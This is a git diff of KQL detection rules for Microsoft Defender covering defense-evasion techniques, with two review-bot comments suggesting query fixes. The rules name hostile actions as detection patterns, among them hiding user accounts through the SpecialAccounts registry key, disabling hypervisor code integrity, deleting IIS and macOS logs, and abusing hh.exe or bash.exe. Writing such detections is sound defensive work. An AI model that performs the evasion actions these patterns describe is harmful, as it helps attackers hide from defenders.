@@ -1,10 +1,10 @@ -// Title: Hiding User Account Via SpecialAccounts Registry Key -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2022-07-12 -// Level: high -// Description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.002 - -DeviceRegistryEvents +// Title: Hiding User Account Via SpecialAccounts Registry Key +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2022-07-12 +// Level: high +// Description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.002 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql index 7fe4baed..d83a052d 100644 --- a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql +++ b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql 
@@ -1,12 +1,12 @@ -// Title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine -// Author: @Kostastsale, TheDFIRReport -// Date: 2022-05-14 -// Level: medium -// Description: Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.002 -// False Positives: -// - System administrator activities - -DeviceProcessEvents +// Title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-05-14 +// Level: medium +// Description: Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.002 +// False Positives: +// - System administrator activities + +DeviceProcessEvents | where (ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" and ProcessCommandLine contains "add" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "/d 0") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql b/KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql index 09522f85..48624a27 100644 --- a/KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql +++ b/KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql 
@@ -1,10 +1,10 @@ -// Title: HTML Help HH.EXE Suspicious Child Process -// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-04-01 -// Level: high -// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.initial-access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001 - -DeviceProcessEvents +// Title: HTML Help HH.EXE Suspicious Child Process +// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-04-01 +// Level: high +// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.initial-access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001 + +DeviceProcessEvents | where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe" \ No newline at end of file 
diff --git a/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql b/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql
index abb0fcb4..fb262fb1 100644
--- a/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql
+++ b/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql
@@ -1,10 +1,10 @@
-// Title: Hypervisor Enforced Code Integrity Disabled
-// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati
-// Date: 2023-03-14
-// Level: high
-// Description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-
-DeviceRegistryEvents
+// Title: Hypervisor Enforced Code Integrity Disabled
+// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati
+// Date: 2023-03-14
+// Level: high
+// Description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled")
\ No newline at end of file
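Review bot: The third branch, `RegistryKey endswith "\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled"`, treats the value name as the last path element, but in DeviceRegistryEvents the key path is `RegistryKey` and the value name is `RegistryValueName`, so that branch will not match; conversely the first two branches match any value written under those keys, not only `Enabled`. Suggested shape: `RegistryValueName =~ "Enabled" and (RegistryKey endswith "\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity")`. Separately, `RegistryValueData =~ "DWORD (0x00000000)"` is the Sysmon Details formatting; Defender is, as far as I know, reporting DWORD data as the plain number, so `RegistryValueData == "0"` (optionally with `RegistryValueType =~ "Dword"`) is more likely to fire — worth confirming against live data since the same pattern appears in the other registry rules in this commit. The `-`/`+` lines here are textually identical, so the `| where` line is unchanged context rather than new code.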
diff --git a/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql b/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql index 25a29ba0..7db4db68 100644 --- a/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql +++ b/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql @@ -1,10 +1,10 @@ -// Title: Hypervisor Enforced Paging Translation Disabled -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-07-05 -// Level: high -// Description: Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceRegistryEvents +// Title: Hypervisor Enforced Paging Translation Disabled +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-05 +// Level: high +// Description: Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\DisableHypervisorEnforcedPagingTranslation" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql b/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql index 1537c8b3..c0dc15c6 100644 --- a/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql +++ b/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql 
@@ -1,10 +1,10 @@ -// Title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols -// Author: Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea) -// Date: 2023-09-05 -// Level: high -// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceRegistryEvents +// Title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols +// Author: Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea) +// Date: 2023-09-05 +// Level: high +// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceRegistryEvents | where RegistryValueData contains "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and (RegistryKey endswith "\\http" or RegistryKey endswith "\\https") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql b/KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql index 3abdf710..2f46e888 100644 --- a/KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql +++ b/KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql 
@@ -1,13 +1,13 @@
-// Title: IIS WebServer Access Logs Deleted
-// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-16
-// Level: medium
-// Description: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070
-// False Positives:
-// - During uninstallation of the IIS service
-// - During log rotation
-
-DeviceFileEvents
+// Title: IIS WebServer Access Logs Deleted
+// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-16
+// Level: medium
+// Description: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+// - During uninstallation of the IIS service
+// - During log rotation
+
+DeviceFileEvents
 | where FolderPath contains "\\inetpub\\logs\\LogFiles\\" and FolderPath endswith ".log"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql b/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql
index 2514a852..56c833c8 100644
--- a/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql
+++ b/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql
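Review bot: The query has no `ActionType` filter, so it matches every file event under `\inetpub\logs\LogFiles\` — including the continuous create/modify activity of IIS writing its own logs — even though the rule is specifically about deletion. Add the action to the `| where` clause, e.g. `| where ActionType == "FileDeleted" and FolderPath contains "\\inetpub\\logs\\LogFiles\\" and FolderPath endswith ".log"`. If `FolderPath` in this table turns out to hold only the directory, the `.log` test belongs on `FileName` instead. The `-`/`+` lines of this hunk are textually identical, so this looks like a line-ending-only change and the query is unchanged context.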
@@ -1,14 +1,14 @@ -// Title: IIS WebServer Log Deletion via CommandLine Utilities -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-09-02 -// Level: medium -// Description: Detects attempts to delete Internet Information Services (IIS) log files via command line utilities, which is a common defense evasion technique used by attackers to cover their tracks. -// Threat actors often abuse vulnerabilities in web applications hosted on IIS servers to gain initial access and later delete IIS logs to evade detection. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070 -// False Positives: -// - Deletion of IIS logs that are older than a certain retention period as part of regular maintenance activities. -// - Legitimate schedule tasks or scripts that clean up log files regularly. - -DeviceProcessEvents +// Title: IIS WebServer Log Deletion via CommandLine Utilities +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-02 +// Level: medium +// Description: Detects attempts to delete Internet Information Services (IIS) log files via command line utilities, which is a common defense evasion technique used by attackers to cover their tracks. +// Threat actors often abuse vulnerabilities in web applications hosted on IIS servers to gain initial access and later delete IIS logs to evade detection. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 +// False Positives: +// - Deletion of IIS logs that are older than a certain retention period as part of regular maintenance activities. +// - Legitimate schedule tasks or scripts that clean up log files regularly. 
+ +DeviceProcessEvents | where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase " or ProcessCommandLine contains "rm " or ProcessCommandLine contains "remove-item " or ProcessCommandLine contains "rmdir ") and ProcessCommandLine contains "\\inetpub\\logs\\" and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("cmd.exe", "powershell.exe", "powershell_ise.exe", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql b/KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql index e029eef4..eb1ce306 100644 --- a/KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql +++ b/KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql 
@@ -1,10 +1,10 @@ -// Title: ImagingDevices Unusual Parent/Child Processes -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-27 -// Level: high -// Description: Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution - -DeviceProcessEvents +// Title: ImagingDevices Unusual Parent/Child Processes +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-27 +// Level: high +// Description: Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\ImagingDevices.exe" or (FolderPath endswith "\\ImagingDevices.exe" and (InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql b/KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql index df92991d..32f3bf54 100644 --- a/KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql +++ b/KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql 
@@ -1,12 +1,12 @@
-// Title: Indicator Removal on Host - Clear Mac System Logs
-// Author: remotephone, oscd.community
-// Date: 2020-10-11
-// Level: medium
-// Description: Detects deletion of local audit logs
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.002
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Indicator Removal on Host - Clear Mac System Logs
+// Author: remotephone, oscd.community
+// Date: 2020-10-11
+// Level: medium
+// Description: Detects deletion of local audit logs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.002
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (FolderPath endswith "/rm" or FolderPath endswith "/unlink" or FolderPath endswith "/shred") and (ProcessCommandLine contains "/var/log" or (ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Logs/"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql b/KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql
index 87b18b56..2a12c40e 100644
--- a/KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql
+++ b/KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql
@@ -1,13 +1,13 @@
-// Title: Indirect Command Execution By Program Compatibility Wizard
-// Author: A. Sungurov , oscd.community
-// Date: 2020-10-12
-// Level: low
-// Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, attack.execution
-// False Positives:
-// - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts
-// - Legit usage of scripts
-
-DeviceProcessEvents
+// Title: Indirect Command Execution By Program Compatibility Wizard
+// Author: A. Sungurov , oscd.community
+// Date: 2020-10-12
+// Level: low
+// Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution
+// False Positives:
+// - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts
+// - Legit usage of scripts
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql b/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql
index d9e28c68..2a87d7a5 100644
--- a/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql
+++ b/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql
@@ -1,11 +1,11 @@
-// Title: Indirect Command Execution From Script File Via Bash.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-15
-// Level: medium
-// Description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly.
-// This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1202
-
-DeviceProcessEvents
+// Title: Indirect Command Execution From Script File Via Bash.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-15
+// Level: medium
+// Description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly.
+// This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
 | where ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe") and (not(((ProcessCommandLine contains "bash.exe -" or ProcessCommandLine contains "bash -") or ProcessCommandLine =~ "" or isnull(ProcessCommandLine) or (ProcessCommandLine in~ ("bash.exe", "bash")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql b/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql
index 3b7107b1..6863b7f2 100644
--- a/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql
+++ b/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql
@@ -1,11 +1,11 @@
-// Title: Indirect Inline Command Execution Via Bash.EXE
-// Author: frack113
-// Date: 2021-11-24
-// Level: medium
-// Description: Detects execution of Microsoft bash launcher with the "-c" flag.
-// This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1202
-
-DeviceProcessEvents
+// Title: Indirect Inline Command Execution Via Bash.EXE
+// Author: frack113
+// Date: 2021-11-24
+// Level: medium
+// Description: Detects execution of Microsoft bash launcher with the "-c" flag.
+// This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -c " and ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql b/KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql
index 5f43d093..7d8c5ca7 100644
--- a/KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql
+++ b/KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql
@@ -1,10 +1,10 @@
-// Title: InfDefaultInstall.exe .inf Execution
-// Author: frack113
-// Date: 2021-07-13
-// Level: medium
-// Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: InfDefaultInstall.exe .inf Execution
+// Author: frack113
+// Date: 2021-07-13
+// Level: medium
+// Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "InfDefaultInstall.exe " and ProcessCommandLine contains ".inf"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql b/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql
index ca915d68..ec6ce9a9 100644
--- a/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql
+++ b/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql
@@ -1,12 +1,12 @@
-// Title: Insensitive Subfolder Search Via Findstr.EXE
-// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020-10-05
-// Level: low
-// Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
-// False Positives:
-// - Administrative or software activity
-
-DeviceProcessEvents
+// Title: Insensitive Subfolder Search Via Findstr.EXE
+// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-05
+// Level: low
+// Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
+// False Positives:
+// - Administrative or software activity
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -i " or ProcessCommandLine contains " /i " or ProcessCommandLine contains " –i " or ProcessCommandLine contains " —i " or ProcessCommandLine contains " ―i ") and (ProcessCommandLine contains " -s " or ProcessCommandLine contains " /s " or ProcessCommandLine contains " –s " or ProcessCommandLine contains " —s " or ProcessCommandLine contains " ―s "))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql b/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql
index 18553f29..0d6d9293 100644
--- a/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql
+++ b/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql
@@ -1,14 +1,14 @@
-// Title: Install New Package Via Winget Local Manifest
-// Author: Sreeman, Florian Roth (Nextron Systems), frack113
-// Date: 2020-04-21
-// Level: medium
-// Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.
-// The manifest option enables you to install an application by passing in a YAML file directly to the client.
-// Winget can be used to download and install exe, msi or msix files later.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1059
-// False Positives:
-// - Some false positives are expected in some environment that may use this functionality to install and test their custom applications
-
-DeviceProcessEvents
+// Title: Install New Package Via Winget Local Manifest
+// Author: Sreeman, Florian Roth (Nextron Systems), frack113
+// Date: 2020-04-21
+// Level: medium
+// Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.
+// The manifest option enables you to install an application by passing in a YAML file directly to the client.
+// Winget can be used to download and install exe, msi or msix files later.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+// False Positives:
+// - Some false positives are expected in some environment that may use this functionality to install and test their custom applications
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and (ProcessCommandLine contains "install" or ProcessCommandLine contains " add ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "--manifest")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/install_root_certificate.kql b/KQL/rules/Defense Evasion/install_root_certificate.kql
index e8e7381b..353acf5a 100644
--- a/KQL/rules/Defense Evasion/install_root_certificate.kql
+++ b/KQL/rules/Defense Evasion/install_root_certificate.kql
@@ -1,12 +1,12 @@
-// Title: Install Root Certificate
-// Author: Ömer Günal, oscd.community
-// Date: 2020-10-05
-// Level: low
-// Description: Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1553.004
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Install Root Certificate
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-05
+// Level: low
+// Description: Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where FolderPath endswith "/update-ca-certificates" or FolderPath endswith "/update-ca-trust"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql b/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql
index 87951736..c7a3d5df 100644
--- a/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql
+++ b/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql
@@ -1,12 +1,12 @@
-// Title: Internet Explorer DisableFirstRunCustomize Enabled
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-16
-// Level: medium
-// Description: Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - As this is controlled by group policy as well as user settings. Some false positives may occur.
-
-DeviceRegistryEvents
+// Title: Internet Explorer DisableFirstRunCustomize Enabled
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: medium
+// Description: Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - As this is controlled by group policy as well as user settings. Some false positives may occur.
+
+DeviceRegistryEvents
